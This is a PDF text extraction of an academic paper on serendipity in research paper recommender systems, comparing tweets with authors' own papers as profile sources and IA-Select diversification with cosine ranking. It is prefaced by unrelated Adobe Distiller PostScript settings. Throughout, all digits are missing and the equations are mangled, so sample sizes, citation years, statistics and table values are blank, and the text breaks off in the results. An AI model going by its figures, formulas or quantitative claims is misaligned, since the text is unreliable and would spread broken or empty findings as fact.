true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice influence of tweets and diversification on serendipitous research paper recommender systems influence of tweets and diversification on serendipitous research paper recommender systems chifumi nishioka ,*, jörn hauke ,* and ansgar scherp kyoto university, kyoto, japan christian-albrechts-universität kiel, kiel, germany university of essex, colchester, uk * these authors contributed equally to this work. abstract in recent years, a large body of literature has accumulated around the topic of research paper recommender systems. however, since most studies have focused on the variable of accuracy, they have overlooked the serendipity of recommendations, which is an important determinant of user satisfaction. serendipity is concerned with the relevance and unexpectedness of recommendations, and so serendipitous items are considered those which positively surprise users. the purpose of this article was to examine two key research questions: firstly, whether a user’s tweets can assist in generating more serendipitous recommendations; and secondly, whether the diversification of a list of recommended items further improves serendipity. to investigate these issues, an online experiment was conducted in the domain of computer science with subjects. as an evaluation metric, we use the serendipity score (srdp), in which the unexpectedness of recommendations is inferred by using a primitive recommendation strategy. the results indicate that a user’s tweets do not improve serendipity, but they can reflect recent research interests and are typically heterogeneous. contrastingly, diversification was found to lead to a greater number of serendipitous research paper recommendations. subjects data mining and machine learning, digital libraries keywords recommender system, experimental study, user study, scholarly articles, serendipity, digital library introduction to help researchers overcome the problem of information overload, various studies have developed recommender systems (beel et al., ; bai et al., ). recommendations are generated based on considerations such as a user’s own papers (sugiyama & kan, ; kaya, ) or the papers a user has accessed or liked in the past (nascimento et al., ; achakulvisut et al., ). most previous studies have focused only on improving the accuracy of recommendations, one example of which is normalised discounted cumulative gain (ndcg). however, several studies on recommender systems conducted in other domains (e.g. movies) have drawn attention to the fact that there are important aspects other than accuracy (mcnee, riedl & konstan, ; herlocker et al., ; kotkov, wang & veijalainen, ; kotkov, veijalainen & wang, ). one of these aspects is serendipity, which is concerned with the unexpectedness of recommendations and the how to cite this article nishioka c, hauke j, scherp a. . influence of tweets and diversification on serendipitous research paper recommender systems. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted april published may corresponding author chifumi nishioka, nishioka.chifumi. c@kyoto-u.ac.jp academic editor nick higham additional information and declarations can be found on page doi . /peerj-cs. copyright nishioka et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nishioka.�chifumi.� c@�kyoto-u.�ac.�jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ degree to which recommendations positively surprise users (ge, delgado-battenfeld & jannach, ). a survey by uchiyama et al. ( ) revealed that researchers think that it is important for them to be recommended serendipitous research papers. in this article, we study a research paper recommender system focusing on serendipity. sugiyama & kan ( ) investigated serendipitous research paper recommendations, focusing on the influence of dissimilar users and the co-author network on recommendation performance. in contrast, this study investigates the following research questions: � (rq ) do a user’s tweets generate serendipitous recommendations? � (rq ) is it possible to improve a recommendation list’s serendipity through diversification? we run an online experiment to facilitate an empirical investigation of these two research questions using three factors. for rq , we employ the factor user profile source, where we compare the two sources of user profiles: firstly, a user’s own papers; and secondly, a user’s tweets. the user’s own papers are a feature of existing recommender systems, as evidenced by the work conducted by sugiyama & kan ( ) and google scholar (https://scholar.google.co.jp/). in this study, we assume that the user’s tweets produce recommendations that cannot be generated based on papers, since researchers tweet about recent developments and interests that are yet not reflected in their papers (e. g. what they found interesting at a conference or in their social network) (letierce et al., ). in addition, they are likely to have used their twitter accounts to express private interests. we conjecture that taking private interests into consideration delivers serendipitous recommendations, since the recommender system will then suggest research papers that include both professional interests and private interests, and which are thus likely to be serendipitous. we also observed that recommendations based on a user’s tweets received a precision of %, which is fairly high in the domain of economics (nishioka & scherp, ). furthermore, we analyse the factor text mining method, which applies different methods of candidate items (i.e. research papers) for computing profiles, as well as user profiles comprising different content (i.e. tweets or previous papers). as text mining methods, we compare tf-idf (salton & buckley, ) with two of its recent extensions, namely cf-idf (goossen et al., ) and hcf-idf (nishioka, große-bölting & scherp, ). both have been associated with high levels of performance in recommendation tasks (goossen et al., ; nishioka, große-bölting & scherp, ). we introduce this factor because text mining methods can have a substantial influence on generating recommendations. for rq , we introduce the factor ranking method, where we compare two ranking methods: firstly, classical cosine similarity; and secondly, the established diversification algorithm ia-select (agrawal et al., ). cosine similarity has been widely used in recommender systems (lops, de gemmis & semeraro, ), while ia-select ranks candidate items with the objective of diversifying recommendations in a list. since it broadens the coverage of topics in a list, we assume that ia-select delivers more serendipitous recommendations compared to cosine similarity. nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://scholar.google.co.jp/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ along with the three factors user profile source, text mining method, and ranking method, we conduct an online experiment in which subjects receive research paper recommendations in the field of computer science. as an evaluation metric, we use the serendipity score (srdp), which takes unexpectedness and usefulness of recommendations into account. it considers a recommendation as unexpected, if it is not recommended by a primitive recommendation strategy (i.e. baseline). the results reveal that a user’s tweets do not improve the serendipity of recommender systems. on the other hand, we confirm that the diversification of a recommendation list by ia-select delivers more serendipitous recommendations to users. the remainder of the paper is organised as follows: firstly, we describe related studies; in turn, we describe the recommender system and the experimental factors and evaluation setup; and finally, before concluding the article, we report on and discuss the experimental results. related work over the last decade, many studies have developed research paper recommender systems (beel et al., ; bai et al., ). according to beel et al. ( ), more than half of these studies ( %) have applied a content-based approach. collaborative filtering was applied by % and graph-based recommendations, utilising citation networks or co-authorship networks, were applied by %. other researches have employed stereotyping, item-centric recommendations, and hybrid recommendations. in this article, we employ a content-based approach, as a number of works have done in the past with promising results (sugiyama & kan, ; nascimento et al., ; achakulvisut et al., ; kaya, ). clarifying the notion of serendipity most existing studies have evaluated research paper recommender systems by focusing on measures of accuracy, including precision, mean reciprocal rank (mrr), and normalised discounted cumulative gain (ndcg). however, studies that have addressed recommender systems in other domains (e.g. movies) argue that there are important considerations other than accuracy (mcnee, riedl & konstan, ; herlocker et al., ). one of these considerations is serendipity, which is a term that has been defined differently in the literature in the context of recommender systems. for instance, kotkov, wang & veijalainen ( ) defined serendipity as “a property that indicates how good a recommender system is at suggesting serendipitous items that are relevant, novel and unexpected for a particular user.” similarly, herlocker et al. ( ) defined serendipity as measure of the extent to which the recommended items are both attractive and surprising to the users. other researchers have offered comparable definitions of serendipity (shani & gunawardana, ). according to ge, delgado-battenfeld & jannach ( ), it is important to recognise two important aspects of serendipity: firstly, a serendipitous item should be unknown to the user and, moreover, should not be expected; and secondly, the item should be interesting, relevant, and useful to the user. taking these two aspects into account, nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ge, delgado-battenfeld & jannach ( ) proposed a quantitative metric to evaluate the degree to which recommender systems are effective at generating serendipitous recommendations. most recently, kotkov et al. ( ) conducted a literature review and operationalised common definitions of serendipity. regarding unexpectedness, they organised four different definitions: � unexpectedness to be relevant (i.e. a user does not expect an item to be relevant). � unexpectedness to be found (i.e. a user would not have found this item on their own). � implicit unexpectedness (i.e. an item is significantly dissimilar to items a user usually consumes). � unexpectedness to be recommended (i.e. a user does not expect an item to be recommended). in terms of novelty, they set two different definitions: � strict novelty (i.e. a user has never heard about an item or has consumed it and forgot about it). � motivationally novelty (i.e. a user has heard about an item, but has not consumed it). this resulted in × = definitions of serendipity. in addition, they investigated effects of different definitions of serendipity on preference broadening and user satisfaction. they found that all variations of unexpectedness and novelty broaden user preferences, but one variation of unexpectedness (unexpected to be relevant) hurts user satisfaction. in this study, we evaluate the serendipity of recommendations using a metric proposed by ge, delgado-battenfeld & jannach ( ). the metric considers a recommendation as unexpected, if it is not recommended by a primitive recommendation strategy (i.e. baseline). thus, this study takes into account “unexpectedness to be found” and “unexpectedness to be recommended” in the different variations of unexpectedness proposed by kotkov et al. ( ). we choose this definition of serendipity as this is most relevant in our library context, where we recommend scientific papers to researchers (vagliano et al., ). use of social media for serendipitous recommendations in previous studies addressing content-based research paper recommender systems (beel et al., ; bai et al., ), the authors calculated recommendations based on a user’s own papers (sugiyama & kan, ) or papers a user has read in the past (nascimento et al., ). in other domains, several studies have developed content-based recommender systems (chen et al., ; orlandi, breslin & passant, ; shen et al., ) that utilise data from a user’s social media accounts, including twitter and facebook. another study proposed research paper recommendations based on a user’s tweets, which received a relatively high precision of % (nishioka & scherp, ). however, we hypothesise that because researchers tweet about recent developments and interests that are not yet reflected in their papers (letierce et al., ), a user’s tweets will deliver recommendations that are not generated based on papers. nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the context of research paper recommender systems, sugiyama & kan ( ) investigated serendipitous research paper recommendations focusing on the influence of dissimilar users and the co-author network on the recommendation performance. however, the researchers evaluated their approaches using accuracy-focused evaluation metrics such as ndcg and mrr. uchiyama et al. ( ) considered serendipitous research papers as papers that are similar but in different fields from users’ field. in contrast, this article investigates serendipitous research paper recommendations from the perspective of tweets and diversification. use of diversification for serendipitous recommendations as discussed above, unexpectedness is a key concept for serendipity (ge, delgado- battenfeld & jannach, ). one approach that can be used to generate unexpected recommendations relates to diversification (ziegler et al., ; agrawal et al., ). this is because diversification leads to the creation of recommendation lists that include dissimilar items, meaning that users have an opportunity to encounter items they are unfamiliar with. ia-select (agrawal et al., ) has been used in the past as a solid baseline for diversifying lists of recommendations (vargas & castells, ; vargas, castells & vallet, ; wu et al., ). additionally, maximum marginal relevance (mmr) (carbonell & goldstein, ) is a well-known diversification method. kotkov, veijalainen & wang ( ) proposed a serendipity-oriented greedy (sog) algorithm, which diversifies a list of recommendations by considering unpopularity and dissimilarity. in this article, we employ ia-select, because the experimental research conducted by vargas & castells ( ) shows that ia-select performs better in general and the sog algorithm requires a parameter setting. experimental factors in this article, we build a content-based recommender system along with the three factors user profile source, text mining method, and ranking method. it works as follows: . candidate items of the recommender system (i.e. research papers) are processed by one of the text mining methods, and paper profiles are generated. a candidate item and a set of candidate items are referred as d and d, respectively. d’s paper profile pd is represented by a set of features f and their weights. depending on text mining methods, a feature f is either a textual term or a concept. formally, paper profiles are described as: pd = {(f, w(f, d)) | ∀ f ∈ f }. the weighting function w returns a weight of a feature f for data source iu. this weight identifies the importance of the feature f for the user u. . a user profile is generated based on the user profile source (i.e. tweets or own papers) using the same text mining method, which is applied to generate paper profiles. iu is a set of data items i of a user u. in this article, iu is either a set of a user’s tweets or a set of a user’s own papers. u’s user profile pu is represented in a way that it is comparable to pu as: pu = {(f, w(f, iu)) | ∀ f ∈ f }. . one of the ranking methods determines the order of recommended papers. nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the experimental design is illustrated in table , where each cell is a possible design choice in each factor. in this section, we first provide a detailed account of the factor user profile source. in turn, we show three of the different text mining methods that were applied in the experiment. finally, we note the details of the factor ranking method, which examines whether diversification improves the serendipity of recommendations. user profile source in this factor, we compare the following two data sources that are used to build a user profile. � research papers: the research papers written by a user are used as a baseline. this approach is motivated by previous studies that have investigated research paper recommender systems, including sugiyama & kan ( ) and google scholar. � twitter: in contrast to the user’s papers, we assume that using tweets leads to more serendipitous recommendations. it is common practice among researchers to tweet about their professional interests (letierce et al., ). therefore, tweets can be used to build a user profile in the context of a research paper recommender system. we hypothesise that a user’s tweets improve the serendipitous nature of recommendations because researchers are likely to tweet about recent interests and information (e.g. from social networks) that are not yet reflected in their papers. text mining method for each of the two data sources (i.e. the user’s own papers or their tweets) and the candidate items, we apply a text mining method using one of three text mining methods. specifically, we compare three methods, namely tf-idf (salton & buckley, ), cf-idf (goossen et al., ), and hcf-idf (nishioka, große-bölting & scherp, ), to build paper profiles and a user profile. this factor was introduced because the effectiveness of each text mining method is informed by the type of content that will be analysed (e.g. tweets or research papers). for each method, a weighting function w is defined. this weighting function assigns a specific weight to each feature f, which is a term in tf-idf and a semantic concept in cf-idf and hcf-idf. � tf-idf: since tf-idf is frequently used in recommender systems as a baseline (goossen et al., ), we also use it in this study. terms are lemmatised and stop words are removed (http://www.nltk.org/book/ch .html). in addition, terms with fewer than table experimental factors and design choices. factor possible design choices user profile source twitter own papers text mining method tf-idf cf-idf hcf-idf ranking method cosine similarity ia-select nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.nltk.org/book/ch .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ three characters are filtered out due to ambiguity. after pre-processing texts, tf-idf is computed as: wtf ‐idfðw; tÞ ¼ tf ðw; tÞ � log jdj jfw d : d djg ( ) tf returns the frequency of a term w in a text t. a text t is either a user profile source iu or candidate item d. the term frequency acts under the assumption that more frequent terms are more important (salton & buckley, ). the second term of the equation presents the inverse document frequency, which measures the relative importance of a term w in a corpus d (i.e. a set of candidate items). � cf-idf: concept frequency inverse document frequency (cf-idf) (goossen et al., ) is an extension of tf-idf, which replaces terms with semantic concepts from a knowledge base. the use of a knowledge base decreases noise in profiles (abel, herder & krause, ; middleton, shadbolt & de roure, ). in addition, since a knowledge base can store multiple labels for a concept, the method directly supports synonyms. for example, the concept “recommender systems” of the acm computing classification systems (acm ccs) has multiple labels, including “recommendation systems”, “recommendation engine”, and “recommendation platforms”. the weighting function w for cf-idf is defined as: wcf ‐idfða; tÞ ¼ cf ða; tÞ � log jdj jfa d : d djg ( ) cf returns the frequency of a semantic concept a in a text t. the second term presents the idf, which measures the relative importance of a semantic concept a in a corpus d. � hcf-idf: finally, we apply hierarchical concept frequency inverse document frequency (hcf-idf) (nishioka, große-bölting & scherp, ), which is an extension of cf-idf. hcf-idf applies a propagation function (kapanipathi et al., ) over a hierarchical structure of a knowledge base to assign a weight to concepts at higher levels. in this way, it identifies concepts that are not mentioned in a text but which are highly relevant. hcf-idf calculates the weight of a semantic concept a in a text t as follows: whcf ‐idfða; tÞ ¼ blða; tÞ � log jdj jfd d : a dgj ( ) bl(a, t) is the belllog propagation function (kapanipathi et al., ), which is defined as: blða; tÞ ¼ cf ða; tÞ þ flðaÞ � x aj pcðaÞ blðaj; tÞ ( ) where cf(a, t) is a frequency of a concept a in a text t, and flðaÞ ¼ log ðnodesðhðaÞ þ ÞÞ . the propagation function underlies the assumption that, in human memory, information is represented through associations or semantic nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ networks (collins & loftus, ). the function h(a) returns the level, where a concept a is located in the knowledge base. additionally, nodes provides the number of concepts at a given level in a knowledge base, and pc(a) returns all parent concepts of a concept a. in this study, we employ hcf-idf since it has been shown to work effectively for short pieces of text, including tweets (nishioka & scherp, ), in the domain of economics. ranking method finally, we rank all the candidate items to determine which items should be recommended to a user. in this factor, we compare two ranking methods: cosine similarity and diversification with ia-select (agrawal et al., ). � cosine similarity: as a baseline, we employ a cosine similarity, which has been widely used in content-based recommender systems. the top-k items with largest cosine similarities are recommended. � ia-select: following this, we employ ia-select (agrawal et al., ) to deliver serendipitous recommendations. ia-select was originally introduced for information retrieval, but it is also used in recommender systems to improve serendipity (vargas, castells & vallet, ). this use case stems from the algorithm’s ability to diversify recommendations in a list, which relies on the avoidance of recommending similar items (e.g. research papers) together. the basic idea of ia-select is that, for those features of a user profile that have been covered by papers already selected for recommendation, the weights are lowered in an iterative manner. at the outset, the algorithm computes cosine similarities between a user and each candidate item. in turn, ia-select adds the item with the largest cosine similarity to the recommendation list. after selecting the item, ia-select decreases the weights of features covered by the selected item in the user profile. these steps are repeated until k recommendations are determined. for example, recommendations for the user profile pu = ((f , . ), (f , . )) will contain mostly those documents that include feature f . however, with ia-select, the f score is decremented iteratively in the event that documents contain the f feature. thus, the probability increases that documents covering the f feature are included in the list of recommended items. overall, the three factors with the design choices described above result in × × = available strategies. the evaluation procedure used to compare the strategies is provided below. evaluation to address the two research questions with the three experimental factors described in the previous section, we conduct an online experiment with subjects. the experiment is based in the field of computer science, in which an open access culture to research papers exists, and twitter is chosen as the focal point because it is an established means by which researchers disseminate their works. the experimental design adopted in this study is consistent with previous studies (nishioka & scherp, ; chen et al., ). nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this section, the experimental design is described, after which an account of the utilised datasets (i.e. a corpus of research papers and a knowledge graph of text mining methods) is given. following this, descriptive statistics are presented for the research subjects, and finally, the serendipity score is stated. the purpose of the serendipity score is to evaluate the degree to which each recommender strategy is effective in generating serendipitous recommendations. procedure we implemented a web application that enabled the subjects (n = ) to evaluate the recommendation strategies described above. first, subjects started on the welcome page, which asked for their consent to collect their data. thereafter, the subjects were asked to input their twitter handle and their name, as recorded in dblp persons (https://dblp.uni-trier.de/pers/). based on the user’s name, we retrieved a list of their research papers and obtained the content of the papers by mapping them to the acm-citation- network v dataset (see below). the top recommendations were computed for each strategy, as shown in fig. . thus, each subject evaluated × = items as “interesting” or “not interesting” based on the perceived relevance to their research interests. a binary evaluation was chosen to minimise the effort of the rating process, consistent with several previous studies (nishioka & scherp, ; chen et al., ). as shown in fig. , the recommended items were displayed with bibliographic information such as the authors, title, year, and venue. finally, the subjects were provided with the opportunity to access and read the research paper directly by clicking on a link. in order to avoid bias, the sequence in which the strategies appeared was randomised for each subject. this corresponds to earlier experimental setups such as a research paper recommender system in the domain of economics (nishioka & scherp, ) and other studies (chen et al., ). at the same time, the list of the top items for each strategy was also randomised to avoid the well-documented phenomenon of ranking bias (bostandjiev, o’donovan & höllerer, ; figure screenshot of the evaluation page. each subject rated an item as either “interesting” or “not interesting” based on their research interests. full-size doi: . /peerj-cs. /fig- nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dblp.uni-trier.de/pers/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen et al., ). the subjects were informed about the randomised order of the strategies and items on the evaluation page. the actual ranks of the recommended items, as well as their position on the evaluation page, were stored in a database for later analyses. after evaluating all strategies, the subjects were asked to complete a questionnaire focusing on demographic information (e.g. age, profession, highest academic degree, and current employment status). finally, an opportunity was provided for the subjects to provide qualitative feedback. datasets the candidate items for the experiment were computer science articles drawn from a large dataset of research papers. to analyse and extract semantic concepts from the research papers and tweets, an external computer science knowledge base was used. this section describes the research papers and knowledge graphs used for the experiment. research papers since the experiment recommended research papers from the field of computer science, a corpus of research papers and a knowledge base from the same field were used. the acm citation network v dataset (https://lfs.aminer.org/lab-datasets/citation/ citation-acm-v .txt.tgz), provided by arnetminer (tang et al., ), was used as the corpus of research papers. from the dataset, , , of the available , , research papers were included that had a title, author, year of publication, venue, and abstract. titles and abstracts were used to generate paper profiles. knowledge graph the acm computing classification system (ccs) was used as the knowledge graph for cf-idf and hcf-idf (https://www.acm.org/publications/class- ). the knowledge graph, which is freely available, is characterised by its focus on computer science, as well as its hierarchical structure. it consists of , concepts and , labels, which are organised on six levels. on average, a concept is represented by . labels (sd: . ). for the text mining methods (i.e. cf-idf and hcf-idf), we extracted concepts from each user’s tweets and research papers by matching the text with the labels of the concepts in the knowledge graph. as such, we applied what is known in the literature as the gazetteer-based approach. before processing, we lemmatised both the tweets and research papers using stanford core nlp (https://stanfordnlp.github.io/corenlp/), and stop words were removed. regarding tweets, which often contain hashtags to indicate topics and user mentions, only the # and @ symbols were removed from the tweets. this decision stemmed from an observation made by feng & wang ( ), namely that the combination of tweets’ texts with hashtags and user mentions results in the optimal recommendation performance. subjects overall, subjects were recruited through twitter and mailing lists. were male and two were female, and the average age was . years old (sd: . ). several of the subjects held master’s degrees (n = ), while the others held a phd (n = ) or were lecturers or nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://lfs.aminer.org/lab-datasets/citation/citation-acm-v .txt.tgz https://lfs.aminer.org/lab-datasets/citation/citation-acm-v .txt.tgz https://www.acm.org/publications/class- https://stanfordnlp.github.io/corenlp/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ professors (n = ). in terms of the subjects’ employment status, were working in academia and three in industry. table shows countries where subjects work. on average, the subjects published , . tweets (sd: , . ), with the minimum value being and the maximum value being , . an average of , . terms (sd: , . ) was extracted from the tweets, along with an average of . concepts (sd: . ). thus, on average, . (sd: . ) terms and . concepts (sd: . ) were included per tweet. we show a histogram regarding the number of terms in tweets per subject in fig. . we observe that subjects are divided into those with a small total number of terms in their tweets and those with a large total number of terms in their tweets. regarding the use of research papers for user profiling, the subjects had published an average of . papers (sd: . ). on average, . terms (sd: , ) and . concepts (sd: . ) were identified in their research papers. this led to . terms (sd: . ) and . concepts (sd: . ) per paper. figure shows a histogram regarding the number of terms in research papers per subject. we see table the number of subjects in each country. country the number of subjects germany us china uk austria brazil france ireland norway sweden figure distribution of subjects with regarding to the number of terms in their tweets. the x-axis shows the number of terms in their tweets. the y-axis shows the number of subjects. for instance, there are five subjects whose total number of terms in tweets is between , and , . full-size doi: . /peerj-cs. /fig- nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that there are a few subjects with a large total number of terms. most subjects have a small total number of terms in their research papers because they published only a few research papers so far. subjects needed s (sd: s) on average to evaluate all five recommended items per strategy. thus, the average length of time needed to complete the experiment was s. it is worth noting that this time does not include reading the instructions on the welcome page, inputting the twitter handle and dblp record, and completing the questionnaire. evaluation metric to evaluate the serendipity of recommendations, we used the serendipity score (srdp) (ge, delgado-battenfeld & jannach, ). this evaluation metric takes into account both the unexpectedness and usefulness of recommended items, which is defined as: srdp ¼ x d ue rateðdÞ juej ( ) ue denotes a set of unexpected items that are recommended to a user. an item is regarded as unexpected if it is not included in a recommendation list computed by the primitive strategy. we used the strategy own papers × tf-idf × cosine similarity as a primitive strategy since it is a combination of baselines. the function rate(d) returns an evaluation rate of an item d given by a subject. as such, if a subject evaluated an item as “interesting”, the function would return , otherwise . we did not directly ask subjects to evaluate the unexpectedness of recommendations, because this is not the scenario in which the recommender system is used. rather, we were aiming to detect indirectly from the subjects’ responses, if the serendipity feature had an influence on the dependent variables. furthermore, we wanted to keep the online evaluation as simple as possible. asking for “how surprising” a recommendation is, increases the complexity of the experiment. subjects needed to know what a non-surprising recommendation is (in comparison). in addition, the cognitive efforts figure distribution of subjects with regarding to the number of terms in their research papers. the x-axis shows the number of terms in their research papers. the y-axis shows the number of sub- jects. for instance, there are two subjects whose total number of terms in research papers is between , and , . full-size doi: . /peerj-cs. /fig- nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ required to conduct a direct evaluation of unexpectedness is much higher and it is in general difficult for subjects to share the concept of the unexpectedness. results the purpose of this section is to present the results of the experiment. at the outset, the quantitative analysis is examined, which shows the optimal strategy in terms of srdp. in turn, the impact of each of the three experimental factors is analysed. comparison of the strategies the results of the strategies in terms of their srdp values are presented in table . as previously noted, this study drew on own papers × tf-idf × cosine similarity as a primitive strategy. thus, for this particular strategy, the mean and standard deviation are . . the purpose of an analysis of variance (anova) is to detect significant differences between variables. therefore, in this study, anova was used to identify whether any of the strategies were significantly different. the significance level was set to α = . . mauchly’s test revealed a violation of sphericity (χ ( ) = . , p = . ), which could lead to positively biased f-statistics and, consequently, an increase in the risk of false positives. therefore, a greenhouse-geisser correction with ε = . was applied. the results of the anova test revealed that significant differences existed between the strategies (f( . , . ) = . , p = . ). therefore, shaffer’s modified sequentially rejective bonferroni procedure was undertaken to compute the pairwise differences between the strategies (shaffer, ). we observed significant differences between the primitive strategy and one of the other strategies. table srdp and the number of unexpected items included in the strategies. the values are ordered by srdp. m and sd denote mean and standard deviation, respectively. strategy srdp |ue| text mining method profiling source ranking method m (sd) m (sd) . tf-idf own papers ia-select . ( . ) . ( . ) . cf-idf twitter cossim . ( . ) . ( . ) . tf-idf twitter ia-select . ( . ) . ( . ) . cf-idf twitter ia-select . ( . ) . ( . ) . cf-idf own papers cossim . ( . ) . ( . ) . cf-idf own papers ia-select . ( . ) . ( . ) . hcf-idf own papers ia-select . ( . ) . ( . ) . hcf-idf twitter cossim . ( . ) . ( . ) . tf-idf twitter cossim . ( . ) . ( . ) . hcf-idf twitter ia-select . ( . ) . ( . ) . hcf-idf own papers cossim . ( . ) . ( . ) . tf-idf own papers cossim . ( . ) . ( . ) nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 